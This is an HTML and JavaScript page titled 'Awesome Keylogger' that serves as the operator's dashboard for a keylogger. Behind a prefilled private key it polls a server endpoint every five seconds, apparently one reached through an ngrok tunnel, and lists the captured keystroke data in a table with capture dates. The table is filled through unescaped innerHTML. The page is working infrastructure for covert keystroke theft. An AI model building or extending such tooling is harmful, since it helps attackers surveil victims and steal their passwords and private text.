<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="ISO-8859-1">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Awesome Keylogger</title>
    <style>
        body {
            font-family: 'Arial', sans-serif;
            background-color: #222;
            color: #fff;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            height: 100vh;
            margin: 0;
        }

        h1 {
            font-size: 2rem;
            text-align: center;
            margin-top: 2rem;
        }

        input[type="text"] {
            width: 90%;
            padding: 0.5rem;
            box-sizing: border-box;
            border: 1px solid #444;
            border-radius: 0.3rem;
            background-color: #333;
            color: #fff;
            margin: 1rem 0;
        }

        .outer-wrapper {
            margin: 10px;
            margin-left: 20px;
            margin-right: 20px;
            border: 1px solid black;
            border-radius: 4px;
            box-shadow: 0px 0px 3px rgb(177, 177, 177);
            max-width: 90%;
            max-height: fit-content;
        }

        .table-wrapper {
            overflow-y: scroll;
            height: fit-content;
            max-height: 66.4vh;
            margin-top: 22px;
            margin: 15px;
            padding-bottom: 20px;
        }

        table {
            border-collapse: separate;
            border-spacing: 0px;
        }

        table th {
            padding: 15px;
            padding-top: 10px;
            padding-bottom: 10px;
            position: sticky;
            top: 0px;
            text-align: center;
            font-weight: normal;
            font-size: 18px;
            color: rgb(241, 245, 179);
            background-color: #222;
            border: 1.5px solid rgb(177, 177, 177);
        }

        table td {
            padding: 15px;
            padding-top: 10px;
            padding-bottom: 10px;
            text-align: left;

            font-size: 15px;
            border: 1px solid rgb(177, 177, 177);
            padding-left: 20px;

        }
    </style>
</head>

<body>
    <h1> !-- Recuperador de data Keylogger --! </h1>
    <h3>Clave Privada</h3>
    <input type="text" id="privateKey" value="example_hotpotato" />
    <br>
    <br>

    <div class="outer-wrapper">
        <div class="table-wrapper">
            <table id="apiDataTable">
                <thead>
                    <tr>
                        <th>ID</th>
                        <th>Data</th>
                        <th>Obtention Date</th>
                    </tr>
                </thead>
                <tbody id="tableBody">
                    <!-- Data will be displayed here -->
                </tbody>
            </table>
        </div>
    </div>

    <script>
        // Function to fetch data from the API and update the table
        function fetchDataAndPopulateTable() {
            var completeURL = "/data/all/query?key=" + document.getElementById("privateKey").value;
            fetch(completeURL, {
                method: "get",
                headers: new Headers({
                    "ngrok-skip-browser-warning": "69420",
                }),
            })
                .then(response => response.json())
                .then(data => {
                    // Update the table with the received data
                    const tableBody = document.getElementById('tableBody');
                    tableBody.innerHTML = ''; // Clear the existing data
                    data.forEach(item => {
                        const row = `<tr>
                            <td>${item.id}</td>
                            <td>${item.data}</td>
                            <td>${new Date(item.obtainedDate)}</td>
                        </tr>`;
                        tableBody.innerHTML += row;
                    });
                })
                .catch(error => {
                    console.error('Error fetching data: ', error);
                });
        }

        // Call the function initially and then at 5-second intervals
        fetchDataAndPopulateTable();
        setInterval(fetchDataAndPopulateTable, 5000); // 5 seconds in milliseconds
    </script>
</body>

</html>